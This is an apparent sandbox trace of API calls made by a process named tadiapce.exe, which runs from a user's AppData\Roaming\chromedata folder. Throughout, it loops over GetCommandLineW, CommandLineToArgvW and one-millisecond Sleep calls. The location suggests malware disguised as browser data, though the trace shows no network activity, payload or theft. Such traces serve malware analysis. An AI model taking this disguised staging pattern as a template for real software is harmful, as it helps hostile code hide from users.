	[0085.412] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f3328*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.412] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.412] Sleep (dwMilliseconds=0x1) 
	[0085.458] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f33b8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.458] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.458] Sleep (dwMilliseconds=0x1) 
	[0085.504] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f3448*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.504] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.504] Sleep (dwMilliseconds=0x1) 
	[0085.556] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x218ba0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.556] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.556] Sleep (dwMilliseconds=0x1) 
	[0085.613] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x218c30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.613] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.613] Sleep (dwMilliseconds=0x1) 
	[0085.660] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1eee30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.660] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.660] Sleep (dwMilliseconds=0x1) 
	[0085.707] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1eeec0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.707] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.707] Sleep (dwMilliseconds=0x1) 
	[0085.739] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1eef50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.739] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.739] Sleep (dwMilliseconds=0x1) 
	[0085.785] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1eefe0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.785] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.785] Sleep (dwMilliseconds=0x1) 
	[0085.821] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef070*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.821] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.821] Sleep (dwMilliseconds=0x1) 
	[0085.863] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef100*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.863] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.863] Sleep (dwMilliseconds=0x1) 
	[0085.910] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef190*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.910] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.910] Sleep (dwMilliseconds=0x1) 
	[0085.949] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef220*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.950] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.950] Sleep (dwMilliseconds=0x1) 
	[0085.957] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef2b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.957] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.957] Sleep (dwMilliseconds=0x1) 
	[0086.003] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef340*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.003] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.004] Sleep (dwMilliseconds=0x1) 
	[0086.050] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef3d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.050] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.050] Sleep (dwMilliseconds=0x1) 
	[0086.097] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef460*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.097] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.097] Sleep (dwMilliseconds=0x1) 
	[0086.144] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef4f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.144] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.144] Sleep (dwMilliseconds=0x1) 
	[0086.187] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef580*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.187] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.187] Sleep (dwMilliseconds=0x1) 
	[0086.222] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef610*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.222] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.222] Sleep (dwMilliseconds=0x1) 
	[0086.267] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef6a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.267] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.267] Sleep (dwMilliseconds=0x1) 
	[0086.300] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef730*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.300] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.300] Sleep (dwMilliseconds=0x1) 
	[0086.348] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef7c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.348] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.348] Sleep (dwMilliseconds=0x1) 
	[0086.394] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef850*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.394] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.394] Sleep (dwMilliseconds=0x1) 
	[0086.440] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef8e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.440] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.440] Sleep (dwMilliseconds=0x1) 
	[0086.487] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ef970*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.487] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.487] Sleep (dwMilliseconds=0x1) 
	[0086.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efa00*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.534] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.534] Sleep (dwMilliseconds=0x1) 
	[0086.628] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efa90*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.628] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.628] Sleep (dwMilliseconds=0x1) 
	[0086.674] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efb20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.674] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.674] Sleep (dwMilliseconds=0x1) 
	[0086.708] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efbb0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.708] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.708] Sleep (dwMilliseconds=0x1) 
	[0086.752] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efc40*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.752] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.752] Sleep (dwMilliseconds=0x1) 
	[0086.799] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efcd0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.799] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.799] Sleep (dwMilliseconds=0x1) 
	[0086.847] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efd60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.847] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.847] Sleep (dwMilliseconds=0x1) 
	[0086.893] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efdf0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.893] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.893] Sleep (dwMilliseconds=0x1) 
	[0086.942] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1efe80*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.942] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.942] Sleep (dwMilliseconds=0x1) 
	[0086.986] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1eff10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0086.986] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0086.986] Sleep (dwMilliseconds=0x1) 
	[0087.033] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1effa0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.033] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.033] Sleep (dwMilliseconds=0x1) 
	[0087.080] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0030*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.080] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.080] Sleep (dwMilliseconds=0x1) 
	[0087.114] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f00c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.114] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.114] Sleep (dwMilliseconds=0x1) 
	[0087.158] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0150*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.158] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.158] Sleep (dwMilliseconds=0x1) 
	[0087.205] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f01e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.205] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.205] Sleep (dwMilliseconds=0x1) 
	[0087.251] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0270*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.251] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.251] Sleep (dwMilliseconds=0x1) 
	[0087.299] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0300*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.299] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.299] Sleep (dwMilliseconds=0x1) 
	[0087.345] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0390*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.345] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.345] Sleep (dwMilliseconds=0x1) 
	[0087.392] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0420*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.392] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.392] Sleep (dwMilliseconds=0x1) 
	[0087.438] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f04b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.439] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.439] Sleep (dwMilliseconds=0x1) 
	[0087.486] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0540*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.486] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.486] Sleep (dwMilliseconds=0x1) 
	[0087.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f05d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.532] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.532] Sleep (dwMilliseconds=0x1) 
	[0087.579] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0660*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.579] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.579] Sleep (dwMilliseconds=0x1) 
	[0087.626] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f06f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.626] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.626] Sleep (dwMilliseconds=0x1) 
	[0087.659] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0780*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.659] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.659] Sleep (dwMilliseconds=0x1) 
	[0087.704] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0810*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.704] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.704] Sleep (dwMilliseconds=0x1) 
	[0087.751] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f08a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.751] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.751] Sleep (dwMilliseconds=0x1) 
	[0087.797] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0930*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.797] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.797] Sleep (dwMilliseconds=0x1) 
	[0087.844] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f09c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.844] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.844] Sleep (dwMilliseconds=0x1) 
	[0087.891] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0a50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.891] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.891] Sleep (dwMilliseconds=0x1) 
	[0087.938] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0ae0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.938] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.938] Sleep (dwMilliseconds=0x1) 
	[0087.985] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f0b70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0087.985] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0087.985] Sleep (dwMilliseconds=0x1) 
